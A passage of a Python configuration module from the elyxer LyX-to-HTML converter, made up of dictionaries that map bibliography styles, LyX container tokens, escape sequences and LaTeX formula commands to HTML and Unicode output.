u'cite': u'$surname($year)',
u'default': u'$authors. <i>$title</i>. $publisher, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
}
alpha = {
u'@article': u'$authors. $title.{ <i>$journal</i>{, {$volume}{($number)}}{: $pages}{, $year}.}{ <a href="$url">$url</a>.}{ <a href="$filename">$filename</a>.}{ $note.}',
u'cite': u'$Sur$YY',
u'default': u'$authors. $title.{ <i>$journal</i>,} $year.{ <a href="$url">$url</a>.}{ <a href="$filename">$filename</a>.}{ $note.}',
}
authordate2 = {
u'@article': u'$authors. $year. $title. <i>$journal</i>, <b>$volume</b>($number), $pages.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@book': u'$authors. $year. <i>$title</i>. $publisher.{ URL <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$surname, $year',
u'default': u'$authors. $year. <i>$title</i>. $publisher.{ URL <a href="$url">$url</a>.}{ $note.}',
}
default = {
u'@article': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@book': u'{$authors: }<i>$title</i>{ ($editor, ed.)}.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@booklet': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@conference': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@inbook': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@incollection': u'$authors: <i>$title</i>{ in <i>$booktitle</i>{ ($editor, ed.)}}.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@inproceedings': u'$authors: “$title”, <i>$booktitle</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@manual': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@mastersthesis': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@misc': u'$authors: <i>$title</i>.{{ $publisher,}{ $howpublished,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@phdthesis': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@proceedings': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@techreport': u'$authors: <i>$title</i>, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@unpublished': u'$authors: “$title”, <i>$journal</i>, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$index',
u'default': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
}
defaulttags = {
u'YY': u'??', u'authors': u'', u'surname': u'',
}
ieeetr = {
u'@article': u'$authors, “$title”, <i>$journal</i>, vol. $volume, no. $number, pp. $pages, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@book': u'$authors, <i>$title</i>. $publisher, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$index',
u'default': u'$authors, “$title”. $year.{ URL <a href="$url">$url</a>.}{ $note.}',
}
plain = {
u'@article': u'$authors. $title.{ <i>$journal</i>{, {$volume}{($number)}}{:$pages}{, $year}.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@book': u'$authors. <i>$title</i>. $publisher,{ $month} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@incollection': u'$authors. $title.{ In <i>$booktitle</i> {($editor, ed.)}.} $publisher,{ $month} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@inproceedings': u'$authors. $title. { <i>$booktitle</i>{, {$volume}{($number)}}{:$pages}{, $year}.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$index',
u'default': u'{$authors. }$title.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
}
vancouver = {
u'@article': u'$authors. $title. <i>$journal</i>, $year{;{<b>$volume</b>}{($number)}{:$pages}}.{ URL: <a href="$url">$url</a>.}{ $note.}',
u'@book': u'$authors. $title. {$publisher, }$year.{ URL: <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$index',
u'default': u'$authors. $title; {$publisher, }$year.{ $howpublished.}{ URL: <a href="$url">$url</a>.}{ $note.}',
}
class BibTeXConfig(object):
"Configuration class from elyxer.config file"
replaced = {
u'--': u'—', u'..': u'.',
}
class ContainerConfig(object):
"Configuration class from elyxer.config file"
endings = {
u'Align': u'\\end_layout', u'BarredText': u'\\bar',
u'BoldText': u'\\series', u'Cell': u'</cell',
u'ChangeDeleted': u'\\change_unchanged',
u'ChangeInserted': u'\\change_unchanged', u'ColorText': u'\\color',
u'EmphaticText': u'\\emph', u'Hfill': u'\\hfill', u'Inset': u'\\end_inset',
u'Layout': u'\\end_layout', u'LyXFooter': u'\\end_document',
u'LyXHeader': u'\\end_header', u'Row': u'</row', u'ShapedText': u'\\shape',
u'SizeText': u'\\size', u'StrikeOut': u'\\strikeout',
u'TextFamily': u'\\family', u'VersalitasText': u'\\noun',
}
extracttext = {
u'allowed': [u'StringContainer', u'Constant', u'FormulaConstant',],
u'cloned': [u'',],
u'extracted': [u'PlainLayout', u'TaggedText', u'Align', u'Caption', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula', u'Bracket', u'RawText', u'BibTag', u'FormulaNumber', u'AlphaCommand', u'EmptyCommand', u'OneParamFunction', u'SymbolFunction', u'TextFunction', u'FontFunction', u'CombiningFunction', u'DecoratingFunction', u'FormulaSymbol', u'BracketCommand', u'TeXCode',],
}
startendings = {
u'\\begin_deeper': u'\\end_deeper', u'\\begin_inset': u'\\end_inset',
u'\\begin_layout': u'\\end_layout',
}
starts = {
u'': u'StringContainer', u'#LyX': u'BlackBox', u'</lyxtabular': u'BlackBox',
u'<cell': u'Cell', u'<column': u'Column', u'<row': u'Row',
u'\\align': u'Align', u'\\bar': u'BarredText',
u'\\bar default': u'BlackBox', u'\\bar no': u'BlackBox',
u'\\begin_body': u'BlackBox', u'\\begin_deeper': u'DeeperList',
u'\\begin_document': u'BlackBox', u'\\begin_header': u'LyXHeader',
u'\\begin_inset Argument': u'ShortTitle',
u'\\begin_inset Box': u'BoxInset', u'\\begin_inset Branch': u'Branch',
u'\\begin_inset Caption': u'Caption',
u'\\begin_inset CommandInset bibitem': u'BiblioEntry',
u'\\begin_inset CommandInset bibtex': u'BibTeX',
u'\\begin_inset CommandInset citation': u'BiblioCitation',
u'\\begin_inset CommandInset href': u'URL',
u'\\begin_inset CommandInset include': u'IncludeInset',
u'\\begin_inset CommandInset index_print': u'PrintIndex',
u'\\begin_inset CommandInset label': u'Label',
u'\\begin_inset CommandInset line': u'LineInset',
u'\\begin_inset CommandInset nomencl_print': u'PrintNomenclature',
u'\\begin_inset CommandInset nomenclature': u'NomenclatureEntry',
u'\\begin_inset CommandInset ref': u'Reference',
u'\\begin_inset CommandInset toc': u'TableOfContents',
u'\\begin_inset ERT': u'ERT', u'\\begin_inset Flex': u'FlexInset',
u'\\begin_inset Flex Chunkref': u'NewfangledChunkRef',
u'\\begin_inset Flex Marginnote': u'SideNote',
u'\\begin_inset Flex Sidenote': u'SideNote',
u'\\begin_inset Flex URL': u'FlexURL', u'\\begin_inset Float': u'Float',
u'\\begin_inset FloatList': u'ListOf', u'\\begin_inset Foot': u'Footnote',
u'\\begin_inset Formula': u'Formula',
u'\\begin_inset FormulaMacro': u'FormulaMacro',
u'\\begin_inset Graphics': u'Image',
u'\\begin_inset Index': u'IndexReference',
u'\\begin_inset Info': u'InfoInset',
u'\\begin_inset LatexCommand bibitem': u'BiblioEntry',
u'\\begin_inset LatexCommand bibtex': u'BibTeX',
u'\\begin_inset LatexCommand cite': u'BiblioCitation',
u'\\begin_inset LatexCommand citealt': u'BiblioCitation',
u'\\begin_inset LatexCommand citep': u'BiblioCitation',
u'\\begin_inset LatexCommand citet': u'BiblioCitation',
u'\\begin_inset LatexCommand htmlurl': u'URL',
u'\\begin_inset LatexCommand index': u'IndexReference',
u'\\begin_inset LatexCommand label': u'Label',
u'\\begin_inset LatexCommand nomenclature': u'NomenclatureEntry',
u'\\begin_inset LatexCommand prettyref': u'Reference',
u'\\begin_inset LatexCommand printindex': u'PrintIndex',
u'\\begin_inset LatexCommand printnomenclature': u'PrintNomenclature',
u'\\begin_inset LatexCommand ref': u'Reference',
u'\\begin_inset LatexCommand tableofcontents': u'TableOfContents',
u'\\begin_inset LatexCommand url': u'URL',
u'\\begin_inset LatexCommand vref': u'Reference',
u'\\begin_inset Marginal': u'SideNote',
u'\\begin_inset Newline': u'NewlineInset',
u'\\begin_inset Newpage': u'NewPageInset', u'\\begin_inset Note': u'Note',
u'\\begin_inset OptArg': u'ShortTitle',
u'\\begin_inset Phantom': u'PhantomText',
u'\\begin_inset Quotes': u'QuoteContainer',
u'\\begin_inset Tabular': u'Table', u'\\begin_inset Text': u'InsetText',
u'\\begin_inset VSpace': u'VerticalSpace', u'\\begin_inset Wrap': u'Wrap',
u'\\begin_inset listings': u'Listing',
u'\\begin_inset script': u'ScriptInset', u'\\begin_inset space': u'Space',
u'\\begin_layout': u'Layout', u'\\begin_layout Abstract': u'Abstract',
u'\\begin_layout Author': u'Author',
u'\\begin_layout Bibliography': u'Bibliography',
u'\\begin_layout Chunk': u'NewfangledChunk',
u'\\begin_layout Description': u'Description',
u'\\begin_layout Enumerate': u'ListItem',
u'\\begin_layout Itemize': u'ListItem', u'\\begin_layout List': u'List',
u'\\begin_layout LyX-Code': u'LyXCode',
u'\\begin_layout Plain': u'PlainLayout',
u'\\begin_layout Standard': u'StandardLayout',
u'\\begin_layout Title': u'Title', u'\\begin_preamble': u'LyXPreamble',
u'\\change_deleted': u'ChangeDeleted',
u'\\change_inserted': u'ChangeInserted',
u'\\change_unchanged': u'BlackBox', u'\\color': u'ColorText',
u'\\color inherit': u'BlackBox', u'\\color none': u'BlackBox',
u'\\emph default': u'BlackBox', u'\\emph off': u'BlackBox',
u'\\emph on': u'EmphaticText', u'\\emph toggle': u'EmphaticText',
u'\\end_body': u'LyXFooter', u'\\family': u'TextFamily',
u'\\family default': u'BlackBox', u'\\family roman': u'BlackBox',
u'\\hfill': u'Hfill', u'\\labelwidthstring': u'BlackBox',
u'\\lang': u'LangLine', u'\\length': u'InsetLength',
u'\\lyxformat': u'LyXFormat', u'\\lyxline': u'LyXLine',
u'\\newline': u'Newline', u'\\newpage': u'NewPage',
u'\\noindent': u'BlackBox', u'\\noun default': u'BlackBox',
u'\\noun off': u'BlackBox', u'\\noun on': u'VersalitasText',
u'\\paragraph_spacing': u'BlackBox', u'\\series bold': u'BoldText',
u'\\series default': u'BlackBox', u'\\series medium': u'BlackBox',
u'\\shape': u'ShapedText', u'\\shape default': u'BlackBox',
u'\\shape up': u'BlackBox', u'\\size': u'SizeText',
u'\\size normal': u'BlackBox', u'\\start_of_appendix': u'StartAppendix',
u'\\strikeout default': u'BlackBox', u'\\strikeout on': u'StrikeOut',
}
string = {
u'startcommand': u'\\',
}
table = {
u'headers': [u'<lyxtabular', u'<features',],
}
class EscapeConfig(object):
"Configuration class from elyxer.config file"
chars = {
u'\n': u'', u' -- ': u' — ', u' --- ': u' — ', u'\'': u'’', u'`': u'‘',
}
commands = {
u'\\InsetSpace \\space{}': u' ', u'\\InsetSpace \\thinspace{}': u' ',
u'\\InsetSpace ~': u' ', u'\\SpecialChar \\-': u'',
u'\\SpecialChar \\@.': u'.', u'\\SpecialChar \\ldots{}': u'…',
u'\\SpecialChar \\menuseparator': u' ▷ ',
u'\\SpecialChar \\nobreakdash-': u'-', u'\\SpecialChar \\slash{}': u'/',
u'\\SpecialChar \\textcompwordmark{}': u'', u'\\backslash': u'\\',
}
entities = {
u'&': u'&', u'<': u'<', u'>': u'>',
}
html = {
u'/>': u'>',
}
iso885915 = {
u' ': u' ', u' ': u' ', u' ': u' ',
}
nonunicode = {
u' ': u' ',
}
class FormulaConfig(object):
"Configuration class from elyxer.config file"
alphacommands = {
u'\\AA': u'Å', u'\\AE': u'Æ',
u'\\AmS': u'<span class="versalitas">AmS</span>', u'\\Angstroem': u'Å',
u'\\DH': u'Ð', u'\\Koppa': u'Ϟ', u'\\L': u'Ł', u'\\Micro': u'µ', u'\\O': u'Ø',
u'\\OE': u'Œ', u'\\Sampi': u'Ϡ', u'\\Stigma': u'Ϛ', u'\\TH': u'Þ',
u'\\aa': u'å', u'\\ae': u'æ', u'\\alpha': u'α', u'\\beta': u'β',
u'\\delta': u'δ', u'\\dh': u'ð', u'\\digamma': u'ϝ', u'\\epsilon': u'ϵ',
u'\\eta': u'η', u'\\eth': u'ð', u'\\gamma': u'γ', u'\\i': u'ı',
u'\\imath': u'ı', u'\\iota': u'ι', u'\\j': u'ȷ', u'\\jmath': u'ȷ',
u'\\kappa': u'κ', u'\\koppa': u'ϟ', u'\\l': u'ł', u'\\lambda': u'λ',
u'\\mu': u'μ', u'\\nu': u'ν', u'\\o': u'ø', u'\\oe': u'œ', u'\\omega': u'ω',
u'\\phi': u'φ', u'\\pi': u'π', u'\\psi': u'ψ', u'\\rho': u'ρ',
u'\\sampi': u'ϡ', u'\\sigma': u'σ', u'\\ss': u'ß', u'\\stigma': u'ϛ',
u'\\tau': u'τ', u'\\tcohm': u'Ω', u'\\textcrh': u'ħ', u'\\th': u'þ',
u'\\theta': u'θ', u'\\upsilon': u'υ', u'\\varDelta': u'∆',
u'\\varGamma': u'Γ', u'\\varLambda': u'Λ', u'\\varOmega': u'Ω',
u'\\varPhi': u'Φ', u'\\varPi': u'Π', u'\\varPsi': u'Ψ', u'\\varSigma': u'Σ',
u'\\varTheta': u'Θ', u'\\varUpsilon': u'Υ', u'\\varXi': u'Ξ',
u'\\varbeta': u'ϐ', u'\\varepsilon': u'ε', u'\\varkappa': u'ϰ',
u'\\varphi': u'φ', u'\\varpi': u'ϖ', u'\\varrho': u'ϱ', u'\\varsigma': u'ς',
u'\\vartheta': u'ϑ', u'\\xi': u'ξ', u'\\zeta': u'ζ',
}
array = {
u'begin': u'\\begin', u'cellseparator': u'&', u'end': u'\\end',
u'rowseparator': u'\\\\',
}
bigbrackets = {
u'(': [u'⎛', u'⎜', u'⎝',], u')': [u'⎞', u'⎟', u'⎠',], u'[': [u'⎡', u'⎢', u'⎣',],
u']': [u'⎤', u'⎥', u'⎦',], u'{': [u'⎧', u'⎪', u'⎨', u'⎩',], u'|': [u'|',],
u'}': [u'⎫', u'⎪', u'⎬', u'⎭',], u'∥': [u'∥',],
}
bigsymbols = {
u'∑': [u'⎲', u'⎳',], u'∫': [u'⌠', u'⌡',],
}
bracketcommands = {
u'\\left': u'span class="symbol"',
u'\\left.': u'<span class="leftdot"></span>',
u'\\middle': u'span class="symbol"', u'\\right': u'span class="symbol"',
u'\\right.': u'<span class="rightdot"></span>',
}
combiningfunctions = {
u'\\"': u'̈', u'\\\'': u'́', u'\\^': u'̂', u'\\`': u'̀', u'\\acute': u'́',
u'\\bar': u'̄', u'\\breve': u'̆', u'\\c': u'̧', u'\\check': u'̌',
u'\\dddot': u'⃛', u'\\ddot': u'̈', u'\\dot': u'̇', u'\\grave': u'̀',
u'\\hat': u'̂', u'\\mathring': u'̊', u'\\overleftarrow': u'⃖',
u'\\overrightarrow': u'⃗', u'\\r': u'̊', u'\\s': u'̩',
u'\\textcircled': u'⃝', u'\\textsubring': u'̥', u'\\tilde': u'̃',
u'\\v': u'̌', u'\\vec': u'⃗', u'\\~': u'̃',
}
commands = {
u'\\ ': u' ', u'\\!': u'', u'\\#': u'#', u'\\$': u'$', u'\\%': u'%',
u'\\&': u'&', u'\\,': u' ', u'\\:': u' ', u'\\;': u' ', u'\\AC': u'∿',
u'\\APLcomment': u'⍝', u'\\APLdownarrowbox': u'⍗', u'\\APLinput': u'⍞',
u'\\APLinv': u'⌹', u'\\APLleftarrowbox': u'⍇', u'\\APLlog': u'⍟',
u'\\APLrightarrowbox': u'⍈', u'\\APLuparrowbox': u'⍐', u'\\Box': u'□',
u'\\Bumpeq': u'≎', u'\\CIRCLE': u'●', u'\\Cap': u'⋒',
u'\\CapitalDifferentialD': u'ⅅ', u'\\CheckedBox': u'☑', u'\\Circle': u'○',
u'\\Coloneqq': u'⩴', u'\\ComplexI': u'ⅈ', u'\\ComplexJ': u'ⅉ',
u'\\Corresponds': u'≙', u'\\Cup': u'⋓', u'\\Delta': u'Δ', u'\\Diamond': u'◇',
u'\\Diamondblack': u'◆', u'\\Diamonddot': u'⟐', u'\\DifferentialD': u'ⅆ',
u'\\Downarrow': u'⇓', u'\\EUR': u'€', u'\\Euler': u'ℇ',
u'\\ExponetialE': u'ⅇ', u'\\Finv': u'Ⅎ', u'\\Game': u'⅁', u'\\Gamma': u'Γ',
u'\\Im': u'ℑ', u'\\Join': u'⨝', u'\\LEFTCIRCLE': u'◖', u'\\LEFTcircle': u'◐',
u'\\LHD': u'◀', u'\\Lambda': u'Λ', u'\\Lbag': u'⟅', u'\\Leftarrow': u'⇐',
u'\\Lleftarrow': u'⇚', u'\\Longleftarrow': u'⟸',
u'\\Longleftrightarrow': u'⟺', u'\\Longrightarrow': u'⟹', u'\\Lparen': u'⦅',
u'\\Lsh': u'↰', u'\\Mapsfrom': u'⇐|', u'\\Mapsto': u'|⇒', u'\\Omega': u'Ω',
u'\\P': u'¶', u'\\Phi': u'Φ', u'\\Pi': u'Π', u'\\Pr': u'Pr', u'\\Psi': u'Ψ',
u'\\Qoppa': u'Ϙ', u'\\RHD': u'▶', u'\\RIGHTCIRCLE': u'◗',
u'\\RIGHTcircle': u'◑', u'\\Rbag': u'⟆', u'\\Re': u'ℜ', u'\\Rparen': u'⦆',
u'\\Rrightarrow': u'⇛', u'\\Rsh': u'↱', u'\\S': u'§', u'\\Sigma': u'Σ',
u'\\Square': u'☐', u'\\Subset': u'⋐', u'\\Sun': u'☉', u'\\Supset': u'⋑',
u'\\Theta': u'Θ', u'\\Uparrow': u'⇑', u'\\Updownarrow': u'⇕',
u'\\Upsilon': u'Υ', u'\\Vdash': u'⊩', u'\\Vert': u'∥', u'\\Vvdash': u'⊪',
u'\\XBox': u'☒', u'\\Xi': u'Ξ', u'\\Yup': u'⅄', u'\\\\': u'<br/>',
u'\\_': u'_', u'\\aleph': u'ℵ', u'\\amalg': u'∐', u'\\anchor': u'⚓',
u'\\angle': u'∠', u'\\aquarius': u'♒', u'\\arccos': u'arccos',
u'\\arcsin': u'arcsin', u'\\arctan': u'arctan', u'\\arg': u'arg',
u'\\aries': u'♈', u'\\arrowbullet': u'➢', u'\\ast': u'∗', u'\\asymp': u'≍',
u'\\backepsilon': u'∍', u'\\backprime': u'‵', u'\\backsimeq': u'⋍',
u'\\backslash': u'\\', u'\\ballotx': u'✗', u'\\barwedge': u'⊼',
u'\\because': u'∵', u'\\beth': u'ℶ', u'\\between': u'≬', u'\\bigcap': u'∩',
u'\\bigcirc': u'○', u'\\bigcup': u'∪', u'\\bigodot': u'⊙',
u'\\bigoplus': u'⊕', u'\\bigotimes': u'⊗', u'\\bigsqcup': u'⊔',
u'\\bigstar': u'★', u'\\bigtriangledown': u'▽', u'\\bigtriangleup': u'△',
u'\\biguplus': u'⊎', u'\\bigvee': u'∨', u'\\bigwedge': u'∧',
u'\\biohazard': u'☣', u'\\blacklozenge': u'⧫', u'\\blacksmiley': u'☻',
u'\\blacksquare': u'■', u'\\blacktriangle': u'▲',
u'\\blacktriangledown': u'▼', u'\\blacktriangleleft': u'◂',
u'\\blacktriangleright': u'▶', u'\\blacktriangleup': u'▴', u'\\bot': u'⊥',
u'\\bowtie': u'⋈', u'\\box': u'▫', u'\\boxast': u'⧆', u'\\boxbar': u'◫',
u'\\boxbox': u'⧈', u'\\boxbslash': u'⧅', u'\\boxcircle': u'⧇',
u'\\boxdot': u'⊡', u'\\boxminus': u'⊟', u'\\boxplus': u'⊞',
u'\\boxslash': u'⧄', u'\\boxtimes': u'⊠', u'\\bullet': u'•',
u'\\bumpeq': u'≏', u'\\cancer': u'♋', u'\\cap': u'∩', u'\\capricornus': u'♑',
u'\\cat': u'⁀', u'\\cdot': u'⋅', u'\\cdots': u'⋯', u'\\cent': u'¢',
u'\\centerdot': u'∙', u'\\checkmark': u'✓', u'\\chi': u'χ', u'\\circ': u'∘',
u'\\circeq': u'≗', u'\\circlearrowleft': u'↺', u'\\circlearrowright': u'↻',
u'\\circledR': u'®', u'\\circledast': u'⊛', u'\\circledbslash': u'⦸',
u'\\circledcirc': u'⊚', u'\\circleddash': u'⊝', u'\\circledgtr': u'⧁',
u'\\circledless': u'⧀', u'\\clubsuit': u'♣', u'\\colon': u': ', u'\\coloneqq': u'≔',
u'\\complement': u'∁', u'\\cong': u'≅', u'\\coprod': u'∐',
u'\\copyright': u'©', u'\\cos': u'cos', u'\\cosh': u'cosh', u'\\cot': u'cot',
u'\\coth': u'coth', u'\\csc': u'csc', u'\\cup': u'∪', u'\\curlyvee': u'⋎',
u'\\curlywedge': u'⋏', u'\\curvearrowleft': u'↶',
u'\\curvearrowright': u'↷', u'\\dag': u'†', u'\\dagger': u'†',
u'\\daleth': u'ℸ', u'\\dashleftarrow': u'⇠', u'\\dashv': u'⊣',
u'\\ddag': u'‡', u'\\ddagger': u'‡', u'\\ddots': u'⋱', u'\\deg': u'deg',
u'\\det': u'det', u'\\diagdown': u'╲', u'\\diagup': u'╱',
u'\\diameter': u'⌀', u'\\diamond': u'◇', u'\\diamondsuit': u'♦',
u'\\dim': u'dim', u'\\div': u'÷', u'\\divideontimes': u'⋇',
u'\\dotdiv': u'∸', u'\\doteq': u'≐', u'\\doteqdot': u'≑', u'\\dotplus': u'∔',
u'\\dots': u'…', u'\\doublebarwedge': u'⌆', u'\\downarrow': u'↓',
u'\\downdownarrows': u'⇊', u'\\downharpoonleft': u'⇃',
u'\\downharpoonright': u'⇂', u'\\dsub': u'⩤', u'\\earth': u'♁',
u'\\eighthnote': u'♪', u'\\ell': u'ℓ', u'\\emptyset': u'∅',
u'\\eqcirc': u'≖', u'\\eqcolon': u'≕', u'\\eqsim': u'≂', u'\\euro': u'€',
u'\\exists': u'∃', u'\\exp': u'exp', u'\\fallingdotseq': u'≒',
u'\\fcmp': u'⨾', u'\\female': u'♀', u'\\flat': u'♭', u'\\forall': u'∀',
u'\\fourth': u'⁗', u'\\frown': u'⌢', u'\\frownie': u'☹', u'\\gcd': u'gcd',
u'\\gemini': u'♊', u'\\geq)': u'≥', u'\\geqq': u'≧', u'\\geqslant': u'≥',
u'\\gets': u'←', u'\\gg': u'≫', u'\\ggg': u'⋙', u'\\gimel': u'ℷ',
u'\\gneqq': u'≩', u'\\gnsim': u'⋧', u'\\gtrdot': u'⋗', u'\\gtreqless': u'⋚',
u'\\gtreqqless': u'⪌', u'\\gtrless': u'≷', u'\\gtrsim': u'≳',
u'\\guillemotleft': u'«', u'\\guillemotright': u'»', u'\\hbar': u'ℏ',
u'\\heartsuit': u'♥', u'\\hfill': u'<span class="hfill"> </span>',
u'\\hom': u'hom', u'\\hookleftarrow': u'↩', u'\\hookrightarrow': u'↪',
u'\\hslash': u'ℏ', u'\\idotsint': u'<span class="bigsymbol">∫⋯∫</span>',
u'\\iiint': u'<span class="bigsymbol">∭</span>',
u'\\iint': u'<span class="bigsymbol">∬</span>', u'\\imath': u'ı',
u'\\inf': u'inf', u'\\infty': u'∞', u'\\intercal': u'⊺',
u'\\interleave': u'⫴', u'\\invamp': u'⅋', u'\\invneg': u'⌐',
u'\\jmath': u'ȷ', u'\\jupiter': u'♃', u'\\ker': u'ker', u'\\land': u'∧',
u'\\landupint': u'<span class="bigsymbol">∱</span>', u'\\lang': u'⟪',
u'\\langle': u'⟨', u'\\lblot': u'⦉', u'\\lbrace': u'{', u'\\lbrace)': u'{',
u'\\lbrack': u'[', u'\\lceil': u'⌈', u'\\ldots': u'…', u'\\leadsto': u'⇝',
u'\\leftarrow)': u'←', u'\\leftarrowtail': u'↢', u'\\leftarrowtobar': u'⇤',
u'\\leftharpoondown': u'↽', u'\\leftharpoonup': u'↼',
u'\\leftleftarrows': u'⇇', u'\\leftleftharpoons': u'⥢', u'\\leftmoon': u'☾',
u'\\leftrightarrow': u'↔', u'\\leftrightarrows': u'⇆',
u'\\leftrightharpoons': u'⇋', u'\\leftthreetimes': u'⋋', u'\\leo': u'♌',
u'\\leq)': u'≤', u'\\leqq': u'≦', u'\\leqslant': u'≤', u'\\lessdot': u'⋖',
u'\\lesseqgtr': u'⋛', u'\\lesseqqgtr': u'⪋', u'\\lessgtr': u'≶',
u'\\lesssim': u'≲', u'\\lfloor': u'⌊', u'\\lg': u'lg', u'\\lgroup': u'⟮',
u'\\lhd': u'⊲', u'\\libra': u'♎', u'\\lightning': u'↯', u'\\limg': u'⦇',
u'\\liminf': u'liminf', u'\\limsup': u'limsup', u'\\ll': u'≪',
u'\\llbracket': u'⟦', u'\\llcorner': u'⌞', u'\\lll': u'⋘', u'\\ln': u'ln',
u'\\lneqq': u'≨', u'\\lnot': u'¬', u'\\lnsim': u'⋦', u'\\log': u'log',
u'\\longleftarrow': u'⟵', u'\\longleftrightarrow': u'⟷',
u'\\longmapsto': u'⟼', u'\\longrightarrow': u'⟶', u'\\looparrowleft': u'↫',
u'\\looparrowright': u'↬', u'\\lor': u'∨', u'\\lozenge': u'◊',
u'\\lrcorner': u'⌟', u'\\ltimes': u'⋉', u'\\lyxlock': u'', u'\\male': u'♂',
u'\\maltese': u'✠', u'\\mapsfrom': u'↤', u'\\mapsto': u'↦',
u'\\mathcircumflex': u'^', u'\\max': u'max', u'\\measuredangle': u'∡',
u'\\medbullet': u'⚫', u'\\medcirc': u'⚪', u'\\mercury': u'☿', u'\\mho': u'℧',
u'\\mid': u'∣', u'\\min': u'min', u'\\models': u'⊨', u'\\mp': u'∓',
u'\\multimap': u'⊸', u'\\nLeftarrow': u'⇍', u'\\nLeftrightarrow': u'⇎',
u'\\nRightarrow': u'⇏', u'\\nVDash': u'⊯', u'\\nabla': u'∇',
u'\\napprox': u'≉', u'\\natural': u'♮', u'\\ncong': u'≇', u'\\nearrow': u'↗',
u'\\neg': u'¬', u'\\neg)': u'¬', u'\\neptune': u'♆', u'\\nequiv': u'≢',
u'\\newline': u'<br/>', u'\\nexists': u'∄', u'\\ngeqslant': u'≱',
u'\\ngtr': u'≯', u'\\ngtrless': u'≹', u'\\ni': u'∋', u'\\ni)': u'∋',
u'\\nleftarrow': u'↚', u'\\nleftrightarrow': u'↮', u'\\nleqslant': u'≰',
u'\\nless': u'≮', u'\\nlessgtr': u'≸', u'\\nmid': u'∤', u'\\nolimits': u'',
u'\\nonumber': u'', u'\\not': u'¬', u'\\not<': u'≮', u'\\not=': u'≠',
u'\\not>': u'≯', u'\\notbackslash': u'⍀', u'\\notin': u'∉', u'\\notni': u'∌',
u'\\notslash': u'⌿', u'\\nparallel': u'∦', u'\\nprec': u'⊀',
u'\\nrightarrow': u'↛', u'\\nsim': u'≁', u'\\nsimeq': u'≄',
u'\\nsqsubset': u'⊏̸', u'\\nsubseteq': u'⊈', u'\\nsucc': u'⊁',
u'\\nsucccurlyeq': u'⋡', u'\\nsupset': u'⊅', u'\\nsupseteq': u'⊉',
u'\\ntriangleleft': u'⋪', u'\\ntrianglelefteq': u'⋬',
u'\\ntriangleright': u'⋫', u'\\ntrianglerighteq': u'⋭', u'\\nvDash': u'⊭',
u'\\nvdash': u'⊬', u'\\nwarrow': u'↖', u'\\odot': u'⊙',
u'\\officialeuro': u'€', u'\\oiiint': u'<span class="bigsymbol">∰</span>',
u'\\oiint': u'<span class="bigsymbol">∯</span>',
u'\\oint': u'<span class="bigsymbol">∮</span>',
u'\\ointclockwise': u'<span class="bigsymbol">∲</span>',
u'\\ointctrclockwise': u'<span class="bigsymbol">∳</span>',
u'\\ominus': u'⊖', u'\\oplus': u'⊕', u'\\oslash': u'⊘', u'\\otimes': u'⊗',
u'\\owns': u'∋', u'\\parallel': u'∥', u'\\partial': u'∂', u'\\pencil': u'✎',
u'\\perp': u'⊥', u'\\pisces': u'♓', u'\\pitchfork': u'⋔', u'\\pluto': u'♇',
u'\\pm': u'±', u'\\pointer': u'➪', u'\\pointright': u'☞', u'\\pounds': u'£',
u'\\prec': u'≺', u'\\preccurlyeq': u'≼', u'\\preceq': u'≼',
u'\\precsim': u'≾', u'\\prime': u'′', u'\\prompto': u'∝', u'\\qoppa': u'ϙ',
u'\\qquad': u' ', u'\\quad': u' ', u'\\quarternote': u'♩',
u'\\radiation': u'☢', u'\\rang': u'⟫', u'\\rangle': u'⟩', u'\\rblot': u'⦊',
u'\\rbrace': u'}', u'\\rbrace)': u'}', u'\\rbrack': u']', u'\\rceil': u'⌉',
u'\\recycle': u'♻', u'\\rfloor': u'⌋', u'\\rgroup': u'⟯', u'\\rhd': u'⊳',
u'\\rightangle': u'∟', u'\\rightarrow)': u'→', u'\\rightarrowtail': u'↣',
u'\\rightarrowtobar': u'⇥', u'\\rightharpoondown': u'⇁',
u'\\rightharpoonup': u'⇀', u'\\rightharpooondown': u'⇁',
u'\\rightharpooonup': u'⇀', u'\\rightleftarrows': u'⇄',
u'\\rightleftharpoons': u'⇌', u'\\rightmoon': u'☽',
u'\\rightrightarrows': u'⇉', u'\\rightrightharpoons': u'⥤',
u'\\rightthreetimes': u'⋌', u'\\rimg': u'⦈', u'\\risingdotseq': u'≓',
u'\\rrbracket': u'⟧', u'\\rsub': u'⩥', u'\\rtimes': u'⋊',
